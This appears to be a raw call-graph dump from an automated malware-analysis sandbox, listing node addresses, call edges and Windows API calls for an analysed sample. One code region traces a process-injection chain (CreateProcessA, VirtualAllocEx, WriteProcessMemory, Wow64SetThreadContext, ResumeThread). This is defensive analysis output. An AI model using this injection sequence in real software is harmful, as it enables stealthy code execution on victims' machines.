58199 6d012d70 77 API calls 58200 6d011a21 58199->58200 58201 6d012d70 77 API calls 58200->58201 58202 6d011a82 58201->58202 58243 6d013bd0 58202->58243 58205 6d012d70 77 API calls 58206 6d011a9e 58205->58206 58207 6d012d70 77 API calls 58206->58207 58208 6d011aec 58207->58208 58252 6d012a80 58208->58252 58210 6d011b4c 58212 6d011b62 58210->58212 58275 6d06919e 67 API calls 3 library calls 58210->58275 58211 6d011b58 58276 6d069125 67 API calls 2 library calls 58211->58276 58258 6d0330c0 58212->58258 58262 6d0342e0 58212->58262 58266 6d016850 58212->58266 58270 6d0169e0 58212->58270 58216 6d011b00 58216->58210 58216->58211 58217 6d011b6d moneypunct 58216->58217 58274 6d012e60 77 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 58216->58274 58277 6d013530 67 API calls 58217->58277 58219 6d011ba1 moneypunct 58219->58151 58224->58157 58225->58155 58227 6d012db8 58226->58227 58232 6d012e0d 58227->58232 58288 6d005a30 77 API calls 2 library calls 58227->58288 58229 6d012e02 58289 6d013cc0 67 API calls 58229->58289 58280 6d06948b 58232->58280 58233 6d011746 58233->58171 58235 6d013b3d 58234->58235 58236 6d069bb5 77 API calls 58235->58236 58237 6d013b6f 58236->58237 58238 6d011a0c 58237->58238 58291 6d069533 66 API calls std::exception::_Copy_str 58237->58291 58238->58199 58240 6d013bae 58292 6d06ac75 RaiseException 58240->58292 58242 6d013bc3 58244 6d013bdd 58243->58244 58245 6d069bb5 77 API calls 58244->58245 58246 6d013c0f 58245->58246 58247 6d011a89 58246->58247 58293 6d069533 66 API calls std::exception::_Copy_str 58246->58293 58247->58205 58249 6d013c4e 58294 6d06ac75 RaiseException 58249->58294 58251 6d013c63 58253 6d012acd 58252->58253 58257 6d012ae6 58252->58257 58254 6d012adf 58253->58254 58295 6d0690d8 67 API calls 2 library calls 58253->58295 58296 6d0131e0 77 API calls 2 library calls 58254->58296 58257->58216 58259 6d0330de 58258->58259 58261 6d0330f8 58258->58261 58297 6d015fa0 58259->58297 58261->58217 58263 6d03431d 58262->58263 58264 6d0342fe 58262->58264 58263->58217 58318 6d0162c0 58264->58318 58267 6d016890 58266->58267 58268 6d01686e 58266->58268 58267->58217 58345 6d018bc0 58268->58345 58271 6d016a1f 58270->58271 58272 6d0169fe 58270->58272 58271->58217 58527 6d019110 58272->58527 58274->58216 58275->58211 58276->58212 58277->58219 58278->58167 58279->58170 58281 6d069495 IsDebuggerPresent 58280->58281 58282 6d069493 58280->58282 58290 6d070036 58281->58290 58282->58233 58285 6d06ce7e SetUnhandledExceptionFilter UnhandledExceptionFilter 58286 6d06cea3 GetCurrentProcess TerminateProcess 58285->58286 58287 6d06ce9b __call_reportfault 58285->58287 58286->58233 58287->58286 58288->58229 58289->58232 58290->58285 58291->58240 58292->58242 58293->58249 58294->58251 58295->58254 58296->58257 58298 6d069bb5 77 API calls 58297->58298 58299 6d016003 58298->58299 58300 6d069bb5 77 API calls 58299->58300 58301 6d016028 58300->58301 58302 6d015050 77 API calls 58301->58302 58303 6d016042 58302->58303 58304 6d069bb5 77 API calls 58303->58304 58305 6d016049 58304->58305 58306 6d015050 77 API calls 58305->58306 58307 6d016067 58306->58307 58308 6d069bb5 77 API calls 58307->58308 58309 6d01606e 58308->58309 58310 6d015050 77 API calls 58309->58310 58311 6d01608b 58310->58311 58312 6d069bb5 77 API calls 58311->58312 58313 6d016092 58312->58313 58314 6d015050 77 API calls 58313->58314 58315 6d0160ac 58314->58315 58316 6d0116b0 327 API calls 58315->58316 58317 6d0160de moneypunct 58316->58317 58317->58261 58319 6d069bb5 77 API calls 58318->58319 58320 6d01632b 58319->58320 58321 6d069bb5 77 API calls 58320->58321 58322 6d016350 58321->58322 58323 6d015050 77 API calls 58322->58323 58324 6d01636e 58323->58324 58325 6d069bb5 77 API calls 58324->58325 58326 6d016375 58325->58326 58327 6d015050 77 API calls 58326->58327 58328 6d016392 58327->58328 58329 6d069bb5 77 API calls 58328->58329 58330 6d016399 58329->58330 58331 6d015050 77 API calls 58330->58331 58332 6d0163b3 58331->58332 58333 6d069bb5 77 API calls 58332->58333 58334 6d0163c9 58333->58334 58335 6d0163d4 58334->58335 58336 6d016459 58334->58336 58338 6d0116b0 327 API calls 58335->58338 58343 6d069533 66 API calls std::exception::_Copy_str 58336->58343 58342 6d016402 moneypunct 58338->58342 58339 6d01646b 58344 6d06ac75 RaiseException 58339->58344 58341 6d016482 58342->58263 58343->58339 58344->58341 58346 6d018bd5 EnterCriticalSection 58345->58346 58347 6d018bcc 58345->58347 58355 6d02e030 58346->58355 58347->58267 58351 6d018c13 LeaveCriticalSection 58351->58267 58356 6d02e090 58355->58356 58357 6d02e05d 58355->58357 58359 6d069bb5 77 API calls 58356->58359 58358 6d018bec 58357->58358 58360 6d069bb5 77 API calls 58357->58360 58361 6d01b6c0 GetModuleHandleW 58358->58361 58359->58358 58360->58358 58362 6d01b717 LoadLibraryW 58361->58362 58363 6d01b72a GetProcAddress 58361->58363 58362->58363 58364 6d01b94c 58362->58364 58363->58364 58365 6d01b73e 58363->58365 58366 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58364->58366 58365->58364 58368 6d01b85d 58365->58368 58367 6d018bfa 58366->58367 58367->58351 58374 6d018c40 58367->58374 58388 6d06a116 80 API calls __mbstowcs_s_l 58368->58388 58370 6d01b875 GetModuleHandleW 58370->58364 58371 6d01b8aa GetProcAddress 58370->58371 58371->58364 58373 6d01b8f2 58371->58373 58373->58364 58389 6d01a350 VariantInit VariantInit VariantInit 58374->58389 58375 6d018c63 58376 6d018cf9 58375->58376 58399 6d018b10 EnterCriticalSection 58375->58399 58376->58351 58378 6d018c83 58380 6d018ce2 58378->58380 58381 6d018c9f 58378->58381 58408 6d01b9a0 58378->58408 58380->58351 58416 6d01bab0 58381->58416 58383 6d018cd3 58383->58380 58432 6d018ff0 69 API calls std::tr1::_Xweak 58383->58432 58388->58370 58393 6d01a3b5 58389->58393 58390 6d01a505 VariantClear VariantClear VariantClear 58391 6d01a52a 58390->58391 58391->58375 58392 6d01a3e0 VariantCopy 58394 6d01a3f9 58392->58394 58395 6d01a3ff VariantClear 58392->58395 58393->58390 58393->58392 58394->58395 58396 6d01a413 58395->58396 58396->58390 58397 6d01a549 VariantClear VariantClear VariantClear 58396->58397 58398 6d01a57a 58397->58398 58398->58375 58400 6d018b4b 58399->58400 58401 6d018b53 LeaveCriticalSection 58400->58401 58403 6d069bb5 77 API calls 58400->58403 58401->58378 58404 6d018b64 58403->58404 58405 6d018b80 58404->58405 58433 6d017370 79 API calls 2 library calls 58404->58433 58434 6d0196d0 77 API calls 58405->58434 58409 6d01b9dc 58408->58409 58410 6d01ba7a 58409->58410 58411 6d069bb5 77 API calls 58409->58411 58410->58381 58412 6d01ba3a 58411->58412 58413 6d01ba6a 58412->58413 58479 6d025f00 77 API calls 2 library calls 58412->58479 58435 6d026fd0 58413->58435 58480 6d02b580 58416->58480 58418 6d01baf3 58419 6d018cbd 58418->58419 58485 6d01af30 VariantInit VariantInit VariantInit 58418->58485 58419->58380 58423 6d018d60 EnterCriticalSection 58419->58423 58421 6d01bb0d 58421->58419 58422 6d069bb5 77 API calls 58421->58422 58422->58419 58505 6d019750 58423->58505 58426 6d018d97 58427 6d018e0a 58426->58427 58428 6d018de5 58426->58428 58507 6d01bdf7 58426->58507 58427->58383 58517 6d018e20 58428->58517 58430 6d018e02 58430->58383 58432->58380 58433->58405 58434->58401 58438 6d02700a 58435->58438 58452 6d0278c2 58435->58452 58436 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58437 6d028326 58436->58437 58437->58410 58439 6d01d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58438->58439 58438->58452 58440 6d0278b5 58439->58440 58441 6d01d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58440->58441 58440->58452 58442 6d027920 58441->58442 58443 6d01d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58442->58443 58442->58452 58444 6d027986 58443->58444 58445 6d01d920 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58444->58445 58446 6d0279df 58444->58446 58445->58446 58447 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58446->58447 58446->58452 58448 6d027a7b 58447->58448 58449 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58448->58449 58448->58452 58450 6d027acb 58449->58450 58451 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58450->58451 58450->58452 58453 6d027b19 58451->58453 58452->58436 58453->58452 58454 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58453->58454 58455 6d027b90 58454->58455 58455->58452 58456 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58455->58456 58457 6d027c0b 58456->58457 58457->58452 58458 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58457->58458 58459 6d027ca5 58458->58459 58459->58452 58460 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58459->58460 58461 6d027d3f 58460->58461 58461->58452 58462 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58461->58462 58463 6d027dbb 58462->58463 58463->58452 58464 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58463->58464 58465 6d027e44 58464->58465 58465->58452 58466 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58465->58466 58467 6d027eb5 58466->58467 58467->58452 58468 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58467->58468 58469 6d027f6e 58468->58469 58469->58452 58470 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58469->58470 58471 6d028081 58470->58471 58471->58452 58472 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58471->58472 58473 6d0280ca 58472->58473 58473->58452 58474 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58473->58474 58475 6d0280f9 58474->58475 58475->58452 58476 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58475->58476 58477 6d028175 58476->58477 58477->58452 58478 6d01d9f0 SafeArrayCreateVector SafeArrayPutElement SafeArrayDestroy 58477->58478 58478->58452 58479->58413 58481 6d02b5b5 58480->58481 58482 6d02b5cb VariantInit VariantInit 58480->58482 58481->58418 58484 6d02b5ee 58482->58484 58483 6d02b675 VariantClear VariantClear 58483->58418 58484->58483 58488 6d01af97 58485->58488 58486 6d01b22c VariantClear VariantClear VariantClear 58487 6d01b254 58486->58487 58487->58421 58488->58486 58489 6d01affe VariantCopy 58488->58489 58490 6d01b017 58489->58490 58491 6d01b01d VariantClear 58489->58491 58490->58491 58492 6d01b035 58491->58492 58492->58486 58493 6d069bb5 77 API calls 58492->58493 58494 6d01b0ae 58493->58494 58495 6d06a136 __NMSG_WRITE 66 API calls 58494->58495 58496 6d01b108 58495->58496 58497 6d01b190 SafeArrayGetLBound SafeArrayGetUBound 58496->58497 58498 6d01b28d VariantClear VariantClear VariantClear 58496->58498 58502 6d01b1fd moneypunct 58496->58502 58500 6d01b28b 58497->58500 58501 6d01b1bf SafeArrayAccessData 58497->58501 58499 6d01b2ba 58498->58499 58499->58421 58500->58498 58501->58500 58503 6d01b1d3 _memmove 58501->58503 58502->58486 58504 6d01b1eb SafeArrayUnaccessData 58503->58504 58504->58500 58504->58502 58506 6d018d88 LeaveCriticalSection 58505->58506 58506->58426 58506->58427 58508 6d01be01 58507->58508 58509 6d01be2c SafeArrayDestroy 58508->58509 58510 6d01be33 58508->58510 58509->58510 58512 6d01be6a IsBadReadPtr 58510->58512 58515 6d01be77 58510->58515 58516 6d01befd moneypunct 58510->58516 58511 6d01af30 92 API calls 58511->58516 58512->58515 58513 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 58514 6d01c00f 58513->58514 58514->58428 58515->58511 58516->58513 58518 6d018e39 58517->58518 58519 6d018e7c EnterCriticalSection 58518->58519 58521 6d018f7f moneypunct 58518->58521 58520 6d018e9e 58519->58520 58522 6d018eac LeaveCriticalSection 58520->58522 58521->58430 58522->58521 58523 6d018ebd 58522->58523 58524 6d069bb5 77 API calls 58523->58524 58525 6d018ec4 _memset 58524->58525 58526 6d01c020 246 API calls 58525->58526 58526->58521 58528 6d019121 58527->58528 58529 6d01912c EnterCriticalSection 58527->58529 58528->58271 58530 6d019150 58529->58530 58531 6d01915b LeaveCriticalSection 58530->58531 58532 6d01916a EnterCriticalSection 58531->58532 58537 6d01923f 58531->58537 58533 6d019185 58532->58533 58534 6d019190 LeaveCriticalSection 58533->58534 58535 6d0191a1 58534->58535 58534->58537 58543 6d026b10 58535->58543 58537->58271 58547 6d026b64 58543->58547 58544 6d026f19 InterlockedCompareExchange 58546 6d0191f3 58544->58546 58546->58537 58614 6d019840 58546->58614 58547->58544 58629 6d032e20 58547->58629 58549 6d026edd 58549->58544 58550 6d026f12 SafeArrayDestroy 58549->58550 58550->58544 58552 6d026c6b 58552->58544 58552->58549 58553 6d026c7e SafeArrayGetLBound 58552->58553 58553->58549 58554 6d026c99 SafeArrayGetUBound 58553->58554 58554->58549 58555 6d026cb4 SafeArrayAccessData 58554->58555 58555->58549 58556 6d026cd5 58555->58556 58634 6d025760 67 API calls std::tr1::_Xweak 58556->58634 58558 6d026cf5 SafeArrayUnaccessData 58558->58549 58559 6d026d07 58558->58559 58559->58549 58635 6d011690 77 API calls 58559->58635 58561 6d026d2c 58562 6d069bb5 77 API calls 58561->58562 58563 6d026d3f 58562->58563 58564 6d015050 77 API calls 58563->58564 58565 6d026d59 58564->58565 58566 6d069bb5 77 API calls 58565->58566 58567 6d026d63 58566->58567 58568 6d015050 77 API calls 58567->58568 58569 6d026d7f 58568->58569 58570 6d069bb5 77 API calls 58569->58570 58571 6d026d86 58570->58571 58572 6d015050 77 API calls 58571->58572 58573 6d026da0 58572->58573 58636 6d0150c0 77 API calls 58573->58636 58575 6d026dab 58576 6d069bb5 77 API calls 58575->58576 58577 6d026db2 58576->58577 58578 6d015050 77 API calls 58577->58578 58579 6d026dcf 58578->58579 58637 6d0150c0 77 API calls 58579->58637 58581 6d026dda 58582 6d069bb5 77 API calls 58581->58582 58583 6d026de7 58582->58583 58584 6d015050 77 API calls 58583->58584 58585 6d026e01 58584->58585 58638 6d0150c0 77 API calls 58585->58638 58587 6d026e0c 58588 6d069bb5 77 API calls 58587->58588 58589 6d026e19 58588->58589 58590 6d015050 77 API calls 58589->58590 58591 6d026e33 58590->58591 58592 6d069bb5 77 API calls 58591->58592 58593 6d026e3a 58592->58593 58594 6d015050 77 API calls 58593->58594 58595 6d026e58 58594->58595 58596 6d069bb5 77 API calls 58595->58596 58597 6d026e5f 58596->58597 58598 6d015050 77 API calls 58597->58598 58599 6d026e79 58598->58599 58639 6d0150c0 77 API calls 58599->58639 58601 6d026e84 58640 6d0150c0 77 API calls 58601->58640 58603 6d026e8f 58604 6d069bb5 77 API calls 58603->58604 58605 6d026e9b 58604->58605 58606 6d015050 77 API calls 58605->58606 58607 6d026eb5 58606->58607 58641 6d0150c0 77 API calls 58607->58641 58609 6d026ec0 58642 6d0150c0 77 API calls 58609->58642 58611 6d026ecb 58643 6d012a40 327 API calls 58611->58643 58613 6d026bc2 58613->58544 58613->58549 58633 6d0328c0 InterlockedCompareExchange 58613->58633 58615 6d069bb5 77 API calls 58614->58615 58616 6d019865 58615->58616 58617 6d019227 58616->58617 58644 6d069533 66 API calls std::exception::_Copy_str 58616->58644 58622 6d017140 58617->58622 58619 6d0198ab 58645 6d06ac75 RaiseException 58619->58645 58621 6d0198c0 58646 6d032820 58622->58646 58624 6d01719c 58626 6d0171d7 58624->58626 58651 6d06919e 67 API calls 3 library calls 58624->58651 58625 6d0171f8 58625->58271 58626->58625 58652 6d069d2c 66 API calls 2 library calls 58626->58652 58630 6d032e67 58629->58630 58631 6d032e7b 58629->58631 58630->58631 58632 6d032e9f InterlockedCompareExchange 58630->58632 58631->58613 58632->58613 58633->58552 58634->58558 58635->58561 58636->58575 58637->58581 58638->58587 58639->58601 58640->58603 58641->58609 58642->58611 58643->58549 58644->58619 58645->58621 58647 6d032845 58646->58647 58648 6d0328af 58647->58648 58649 6d069d66 _malloc 66 API calls 58647->58649 58648->58624 58650 6d032876 58649->58650 58650->58624 58651->58626 58652->58625 58653 543b200 58654 543b223 58653->58654 58662 5cc1569 58654->58662 58667 5cc0eb3 58654->58667 58672 5cc0f14 58654->58672 58655 543b23b 58677 5cc26f8 58655->58677 58706 5cc26f2 58655->58706 58656 543b27d 58663 5cc15b6 58662->58663 58664 5cc19c1 58663->58664 58735 543b2a0 58663->58735 58739 543b299 58663->58739 58664->58655 58669 5cc0eb8 58667->58669 58668 5cc19c1 58668->58655 58669->58668 58670 543b2a0 327 API calls 58669->58670 58671 543b299 327 API calls 58669->58671 58670->58668 58671->58668 58673 5cc0f15 58672->58673 58674 5cc19c1 58673->58674 58675 543b2a0 327 API calls 58673->58675 58676 543b299 327 API calls 58673->58676 58674->58655 58675->58674 58676->58674 58678 5cc272b 58677->58678 58786 543ba30 58678->58786 58790 543ba24 58678->58790 58679 5cc28de 58687 5cc29cb 58679->58687 58700 543bf30 Wow64SetThreadContext 58679->58700 58701 543bf28 Wow64SetThreadContext 58679->58701 58680 5cc2a0c 58704 543c030 VirtualAllocEx 58680->58704 58705 543c028 VirtualAllocEx 58680->58705 58681 5cc2a45 58681->58687 58694 543c150 WriteProcessMemory 58681->58694 58695 543c149 WriteProcessMemory 58681->58695 58682 5cc2cbb 58683 5cc2d0f 58682->58683 58692 543bf30 Wow64SetThreadContext 58682->58692 58693 543bf28 Wow64SetThreadContext 58682->58693 58688 543c150 WriteProcessMemory 58683->58688 58689 543c149 WriteProcessMemory 58683->58689 58684 5cc2b54 58684->58682 58690 543c150 WriteProcessMemory 58684->58690 58691 543c149 WriteProcessMemory 58684->58691 58685 5cc2da8 58686 5cc2df3 58685->58686 58696 543bf30 Wow64SetThreadContext 58685->58696 58697 543bf28 Wow64SetThreadContext 58685->58697 58698 543c2a0 ResumeThread 58686->58698 58699 543c2a8 ResumeThread 58686->58699 58687->58656 58688->58685 58689->58685 58690->58684 58691->58684 58692->58683 58693->58683 58694->58684 58695->58684 58696->58686 58697->58686 58698->58687 58699->58687 58700->58680 58701->58680 58704->58681 58705->58681 58707 5cc272b 58706->58707 58733 543ba30 CreateProcessA 58707->58733 58734 543ba24 CreateProcessA 58707->58734 58708 5cc28de 58716 5cc29cb 58708->58716 58794 543bf28 58708->58794 58798 543bf30 58708->58798 58709 5cc2a0c 58801 543c028 58709->58801 58805 543c030 58709->58805 58710 5cc2a45 58710->58716 58808 543c150 58710->58808 58812 543c149 58710->58812 58711 5cc2cbb 58712 5cc2d0f 58711->58712 58719 543bf30 Wow64SetThreadContext 58711->58719 58720 543bf28 Wow64SetThreadContext 58711->58720 58717 543c150 WriteProcessMemory 58712->58717 58718 543c149 WriteProcessMemory 58712->58718 58713 5cc2b54 58713->58711 58721 543c150 WriteProcessMemory 58713->58721 58722 543c149 WriteProcessMemory 58713->58722 58714 5cc2da8 58715 5cc2df3 58714->58715 58725 543bf30 Wow64SetThreadContext 58714->58725 58726 543bf28 Wow64SetThreadContext 58714->58726 58816 543c2a8 58715->58816 58819 543c2a0 58715->58819 58716->58656 58717->58714 58718->58714 58719->58712 58720->58712 58721->58713 58722->58713 58725->58715 58726->58715 58733->58708 58734->58708 58736 543b30b 58735->58736 58743 6d033eb0 58736->58743 58737 543b334 58740 543b2a0 58739->58740 58742 6d033eb0 327 API calls 58740->58742 58741 543b334 58742->58741 58744 6d069bb5 77 API calls 58743->58744 58745 6d033f11 58744->58745 58746 6d069bb5 77 API calls 58745->58746 58747 6d033f36 58746->58747 58748 6d015050 77 API calls 58747->58748 58749 6d033f50 58748->58749 58750 6d069bb5 77 API calls 58749->58750 58751 6d033f57 58750->58751 58752 6d015050 77 API calls 58751->58752 58753 6d033f71 58752->58753 58754 6d069bb5 77 API calls 58753->58754 58755 6d033f78 58754->58755 58756 6d015050 77 API calls 58755->58756 58757 6d033f92 58756->58757 58758 6d069bb5 77 API calls 58757->58758 58759 6d033fab 58758->58759 58760 6d033fb2 58759->58760 58761 6d034031 58759->58761 58763 6d0116b0 327 API calls 58760->58763 58784 6d069533 66 API calls std::exception::_Copy_str 58761->58784 58768 6d033fdc moneypunct 58763->58768 58764 6d034047 58785 6d06ac75 RaiseException 58764->58785 58766 6d03405e 58767 6d069bb5 77 API calls 58766->58767 58769 6d0340b5 58767->58769 58768->58737 58770 6d069bb5 77 API calls 58769->58770 58771 6d0340d8 58770->58771 58772 6d015050 77 API calls 58771->58772 58773 6d0340f2 58772->58773 58774 6d069bb5 77 API calls 58773->58774 58775 6d0340f9 58774->58775 58776 6d015050 77 API calls 58775->58776 58777 6d034113 58776->58777 58778 6d069bb5 77 API calls 58777->58778 58779 6d03411a 58778->58779 58780 6d015050 77 API calls 58779->58780 58781 6d034134 58780->58781 58782 6d0116b0 327 API calls 58781->58782 58783 6d034169 moneypunct 58782->58783 58783->58737 58784->58764 58785->58766 58788 543baae CreateProcessA 58786->58788 58789 543bd14 58788->58789 58792 543ba30 CreateProcessA 58790->58792 58793 543bd14 58792->58793 58795 543bf30 Wow64SetThreadContext 58794->58795 58797 543bfcd 58795->58797 58797->58709 58799 543bf78 Wow64SetThreadContext 58798->58799 58800 543bfcd 58799->58800 58800->58709 58802 543c030 VirtualAllocEx 58801->58802 58804 543c0ee 58802->58804 58804->58710 58806 543c078 VirtualAllocEx 58805->58806 58807 543c0ee 58806->58807 58807->58710 58809 543c1a0 WriteProcessMemory 58808->58809 58811 543c237 58809->58811 58811->58713 58813 543c150 WriteProcessMemory 58812->58813 58815 543c237 58813->58815 58815->58713 58817 543c2ed ResumeThread 58816->58817 58818 543c337 58817->58818 58818->58716 58820 543c2a8 ResumeThread 58819->58820 58822 543c337 58820->58822 58822->58716 59040 6d029357 59041 6d029368 59040->59041 59177 6d0269c0 59041->59177 59043 6d02ae62 SafeArrayDestroy 59044 6d02ae68 59043->59044 59045 6d02ae72 SafeArrayDestroy 59044->59045 59046 6d02ae7b 59044->59046 59045->59046 59048 6d02ae85 SafeArrayDestroy 59046->59048 59049 6d02ae8e 59046->59049 59047 6d0293ac 59050 6d0269c0 11 API calls 59047->59050 59146 6d028739 59047->59146 59048->59049 59051 6d02aea1 59049->59051 59052 6d02ae98 SafeArrayDestroy 59049->59052 59059 6d02943a 59050->59059 59053 6d02aeb4 59051->59053 59054 6d02aeab SafeArrayDestroy 59051->59054 59052->59051 59055 6d02aec7 59053->59055 59056 6d02aebe SafeArrayDestroy 59053->59056 59054->59053 59057 6d06948b __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 59055->59057 59056->59055 59058 6d02aef5 59057->59058 59060 6d0294b1 SafeArrayGetLBound SafeArrayGetUBound 59059->59060 59059->59146 59061 6d029658 59060->59061 59066 6d0294ef 59060->59066 59184 6d01d920 59061->59184 59063 6d0294fd SafeArrayGetElement 59063->59066 59063->59146 59064 6d02840e 59064->59146 59233 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59064->59233 59066->59061 59066->59063 59066->59064 59066->59146 59067 6d028441 59069 6d0284af SafeArrayGetLBound SafeArrayGetUBound 59067->59069 59067->59146 59068 6d02968f 59076 6d029794 SafeArrayGetLBound SafeArrayGetUBound 59068->59076 59068->59146 59070 6d028616 59069->59070 59071 6d0284ed SafeArrayGetElement 59069->59071 59234 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59070->59234 59081 6d028518 59071->59081 59071->59146 59073 6d02862b 59073->59146 59235 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59073->59235 59075 6d02864b 59075->59146 59236 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59075->59236 59087 6d029c5e 59076->59087 59101 6d0297d2 59076->59101 59078 6d02866b 59078->59146 59237 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59078->59237 59079 6d023a90 8 API calls 59079->59081 59080 6d0297e3 SafeArrayGetElement 59080->59101 59080->59146 59081->59070 59081->59071 59081->59079 59083 6d01d920 3 API calls 59090 6d029cf8 59083->59090 59084 6d02868a 59084->59146 59238 6d01dfb0 SafeArrayGetLBound SafeArrayGetUBound SafeArrayGetElement 59084->59238 59086 6d0286aa 59088 6d0269c0 11 API calls 59086->59088 59086->59146 59087->59083 59089 6d0286cf 59088->59089 59091 6d0269c0 11 API calls 59089->59091 59089->59146 59092 6d029d4f SafeArrayGetLBound SafeArrayGetUBound 59090->59092 59090->59146 59093 6d0286f5 59091->59093 59094 6d029ec7 59092->59094 59102 6d029d8d 59092->59102 59095 6d0269c0 11 API calls 59093->59095 59093->59146 59097 6d01d920 3 API calls 59094->59097 59095->59146 59096 6d029da0 SafeArrayGetElement 59096->59102 59096->59146 59098 6d029f09 59097->59098 59099 6d01d920 3 API calls 59098->59099 59098->59146 59103 6d029f8b 59099->59103 59100 6d023a90 8 API calls 59100->59102 59101->59064 59101->59080 59101->59087 59105 6d023a90 8 API calls 59101->59105 59102->59094 59102->59096 59102->59100 59104 6d01d920 3 API calls 59103->59104 59103->59146 59106 6d02a01f 59104->59106 59105->59101 59107 6d01d920 3 API calls 59106->59107 59106->59146 59108 6d02a09b 59107->59108 59109 6d02a1ac SafeArrayGetLBound SafeArrayGetUBound 59108->59109 59108->59146 59110 6d02a7b3 59109->59110 59124 6d02a1ea 59109->59124 59111 6d01d920 3 API calls 59110->59111 59113 6d02a7ce 59111->59113 59112 6d02a1fd SafeArrayGetElement 59115 6d02a815 59112->59115 59112->59124 59114 6d01d920 3 API calls 59113->59114 59113->59146 59114->59115 59115->59146 59192 6d0264d0 VariantInit VariantInit VariantInit SafeArrayCreateVector 59115->59192 59117 6d02a91d 59118 6d0264d0 109 API calls 59117->59118 59117->59146 59119 6d02a950 59118->59119 59120 6d0264d0 109 API calls 59119->59120 59119->59146 59121 6d02a983 59120->59121 59122 6d0264d0 109 API calls 59121->59122 59121->59146 59123 6d02a9b6 59122->59123 59125 6d0264d0 109 API calls 59123->59125 59123->59146 59124->59110 59124->59112 59128 6d023a90 8 API calls 59124->59128 59126 6d02a9e9 59125->59126 59127 6d0264d0 109 API calls 59126->59127 59126->59146 59129 6d02aa1c 59127->59129 59128->59124 59130 6d0264d0 109 API calls 59129->59130 59129->59146 59131 6d02aa4f 59130->59131 59132 6d0264d0 109 API calls 59131->59132 59131->59146 59133 6d02aa82 59132->59133 59134 6d0264d0 109 API calls 59133->59134 59133->59146 59135 6d02aab5 59134->59135 59136 6d0264d0 109 API calls 59135->59136 59135->59146 59137 6d02aae8 59136->59137 59138 6d0264d0 109 API calls 59137->59138 59137->59146 59139 6d02ab1e 59138->59139 59140 6d02abd0 59139->59140 59144 6d02ac5a 59139->59144 59139->59146 59206 6d022970 59140->59206 59239 6d02d790 77 API calls 3 library calls 59144->59239 59146->59043 59146->59044 59147 6d02ac37 59147->59146 59240 6d011690 77 API calls 59147->59240 59149 6d02ad36 59241 6d0150c0 77 API calls 59149->59241 59151 6d02ad4d 59152 6d069bb5 77 API calls 59151->59152 59153 6d02ad5d 59152->59153 59154 6d015050 77 API calls 59153->59154 59155 6d02ad77 59154->59155 59242 6d0150c0 77 API calls 59155->59242 59157 6d02ad82 59158 6d069bb5 77 API calls 59157->59158 59159 6d02ad89 59158->59159 59160 6d015050 77 API calls 59159->59160 59161 6d02ada7 59160->59161 59162 6d069bb5 77 API calls 59161->59162 59163 6d02adae 59162->59163 59164 6d015050 77 API calls 59163->59164 59165 6d02adcc 59164->59165 59243 6d0150c0 77 API calls 59165->59243 59167 6d02add7 59168 6d069bb5 77 API calls 59167->59168 59169 6d02ade1 59168->59169 59170 6d015050 77 API calls 59169->59170 59171 6d02adfb 59170->59171 59244 6d0150c0 77 API calls 59171->59244 59173 6d02ae06 59245 6d0150c0 77 API calls 59173->59245 59175 6d02ae11 59246 6d012a40 327 API calls 59175->59246 59178 6d0269f3 59177->59178 59179 6d026a01 SafeArrayGetLBound SafeArrayGetUBound 59177->59179 59178->59179 59182 6d026a2a 59179->59182 59183 6d026a92 59179->59183 59180 6d026a30 SafeArrayGetElement 59180->59182 59180->59183 59182->59180 59182->59183 59247 6d023990 8 API calls 59182->59247 59183->59047 59185 6d01d944 SafeArrayCreateVector 59184->59185 59186 6d01d936 59184->59186 59187 6d01d95a 59185->59187 59189 6d01d981 59185->59189 59186->59185 59188 6d01d960 SafeArrayPutElement 59187->59188 59187->59189 59188->59187 59188->59189 59190 6d01d9d5 59189->59190 59191 6d01d9ce SafeArrayDestroy 59189->59191 59190->59068 59191->59190 59193 6d026554 59192->59193 59194 6d02655c SafeArrayPutElement VariantClear 59192->59194 59193->59194 59195 6d026584 SafeArrayPutElement VariantClear 59194->59195 59205 6d026655 59194->59205 59199 6d0265cd 59195->59199 59195->59205 59197 6d026665 SafeArrayDestroy 59198 6d02666c VariantClear VariantClear VariantClear 59197->59198 59198->59117 59199->59205 59248 6d01db30 VariantInit SafeArrayCreateVector SafeArrayPutElement 59199->59248 59201 6d02663a 59201->59205 59252 6d0256b0 59201->59252 59205->59197 59205->59198 59216 6d0229c3 59206->59216 59207 6d022d21 59207->59146 59220 6d02d2e0 59207->59220 59208 6d0229ee SafeArrayGetLBound 